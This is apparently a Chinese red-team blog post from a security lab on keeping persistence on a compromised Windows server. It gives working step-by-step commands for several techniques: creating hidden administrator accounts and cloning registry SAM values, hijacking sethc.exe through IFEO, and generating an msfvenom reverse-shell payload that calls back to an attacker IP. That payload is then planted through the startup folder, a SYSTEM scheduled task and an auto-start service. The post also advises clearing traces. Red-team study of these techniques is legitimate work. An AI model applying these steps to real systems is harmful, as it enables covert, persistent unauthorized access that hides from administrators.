『红蓝对抗』Windows 权限维持(一)

日期：2022-04-08

作者：L-Center

介绍：一些常见的Windows权限维持方式。

0x00 前言

前提条件: 拿到目标服务器administrator权限。 

环境：windows Server2012/windows 10

0x01 维持方式

1.1 命令行添加隐藏用户

运行cmd，添加一个名为test1用户并把它添加进管理员组中，用户名称后添加$可以达到隐藏的效果。

net user test1$ 123456 /addnet localgroup administrators test1$ /add

在命令行中无法查看到test1$用户，但在控制面板中仍会查询到该用户。

我们需要做进一步的隐藏。

注意我们要在控制面板中给新建的test1$添加一个远程桌面连接权限。

1.2 注册表隐藏用户

输入命令：regedt32 打开注册表。

定位到HKEY_LOCAL_MACHINESAMSAM中，添加一个管理员控制权限。

重启一下注册表编辑器，访问HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames。

找到Administrator对应的键值，将F值复制到test1$对应目录中的F值。

复制完成后，把test1$和其对应的000003EB目录先导出。

输入net user test1$ /del命令将其删除。

最后双击保存的目录，会自动导入到注册表中。

查看命令行、控制面板、计算机管理都无法找到test1$了。

使用test1$账号连接，echo %username%查看会显示为管理员用户。

把注册表刚才赋予administrator的权限关掉，这样这个账户就很难被发现了。

1.3 多用户登录

在注册表隐藏用户后，管理员在登录时会被下线，所以可以设置多用户登录。

输入gpedit.msc组策略，找到【计算机设置】–【管理模板】–【windows组件】–【远程桌面服务】–【远程桌面会话主机】–【连接】。

拒绝将已经登录到控制台会话的管理员注销—已启用限制连接的数量-已启用（1-999999）将远程桌面服务用户限制到单独的远程桌面服务会话—已禁用

cmd输入gpupdate /force更新组策略。

远程登录后的结果如下：

1.4 镜像劫持

利用Windows的IFEO（Image File Execution Options）功能来实现。当你执行某一程序A的时候，运行的却是另外一个程序B。我们通过修改注册表来实现此功能，使用regedt32打开注册表。找到HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options。

新建一个名为sethc.exe的项。

添加一个debugger的新建，为其加入cmd的路径C:WindowsSystem32cmd.exe。

在登录界面连续点击五次shift出现命令行。

1.5 启动项后门

登录kali打开msfconsole。利用msfconsole生成一个EXE类型的后门木马。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.30.130 lport=6666 -f exe -o test2.exe

将生成的木马放入系统启动项中。 C:ProgramDataMicrosoftWindowsStart MenuProgramsStartUp。

输入以下命令后，重启电脑得到返回shell：

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.30.130set lport 6666exploit

连通时cmd输入netstat -ano可以查看到连接信息。

输入wmic process get name,executablepath,processid|findstr 9180查看文件所在位置。

使用taskkill /f /pid 9180终止该进程。

1.6 计划任务后门

利用msfconsole生成的木马，可以设置计划任务，cmd输入：

schtasks /create /tn test /sc minute /mo 1 /tr C:UsersAdministratorDesktoptest2.exe /ru system /f

监听得到返回shell。

1.7 服务启动后门

利用msfconsole生成的木马，创建名为test的自启动服务。

sc create "test" binpath= "C:UserslrDesktoptest2.exe"sc description "test" "test"sc config "test" start= autonet start "test"

在kali上监听得到返回的shell。

使用sc delete test可以将服务删除。

0x02 总结

以上几个基本都是比较常见的隐藏用户和留后门的方式。

远程连接后注意清理痕迹。

免责声明：本文仅供安全研究与讨论之用，严禁用于非法用途，违者后果自负。

宸极实验室隶属山东九州信泰信息科技股份有限公司，致力于网络安全对抗技术研究，是山东省发改委认定的“网络安全对抗关键技术山东省工程实验室”。团队成员专注于 Web 安全、移动安全、红蓝对抗等领域，善于利用黑客视角发现和解决网络安全问题。

团队自成立以来，圆满完成了多次国家级、省部级重要网络安全保障和攻防演习活动，并积极参加各类网络安全竞赛，屡获殊荣。

对信息安全感兴趣的小伙伴欢迎加入宸极实验室，关注公众号，回复『招聘』，获取联系方式。

原文始发于微信公众号（宸极实验室）：『红蓝对抗』Windows 权限维持(一)